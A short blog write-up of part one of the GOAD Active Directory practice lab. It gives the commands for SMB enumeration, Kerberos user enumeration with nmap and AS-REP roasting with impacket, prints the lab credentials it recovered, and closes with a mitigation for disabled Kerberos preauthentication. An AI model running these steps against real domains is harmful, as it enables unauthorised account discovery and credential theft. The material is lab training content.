Solving Game of Active Directory (GOAD) by Orange Cyberdefense Part-1

n00🔑
3 min readOct 11, 2023
crackmapexec smb live_hosts

smb signing is disabled and version 1 is enabled for some hosts.

Domains identified:

sevenkingdoms.local
essos.local

Enumerating smb shares:

We found that Guest access is allowed for smbshare “all” on 192.168.56.22(CASTELBLACK) machine.

Upon checking this share we found it is empty. But we had write permissions.

smbclient //192.168.56.22/all -U "test"

Enumerating valid users from a list of potential users.

curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/'| grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);
} }' > got_users.txt


nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12

AS-REP Roasting

impacket-GetNPUsers north.sevenkingdoms.local/brandon.stark -no-pass

these creds worked on 3 machines.

192.168.56.23 essos.local\brandon.stark:iseedeadpeople
192.168.56.22 north.sevenkingdoms.local\brandon.stark:iseedeadpeople
192.168.56.11 north.sevenkingdoms.local\brandon.stark:iseedeadpeople

Mitigation for AS-REP Roasting

Upon Investigating the brandon.stark user, we came to know that this user has “Kerberos preauthentication disabled”.

Uncheck this option and run GetNPusers.py again.

So, we just need to make sure, this option is not enabled for any of the user.

When Kerberos Preauth requirement is disabled we directly get AS-REP in response to AS-REQ

where as when it is enabled we get “Preauth required” error.

Thanks for reading!

--

--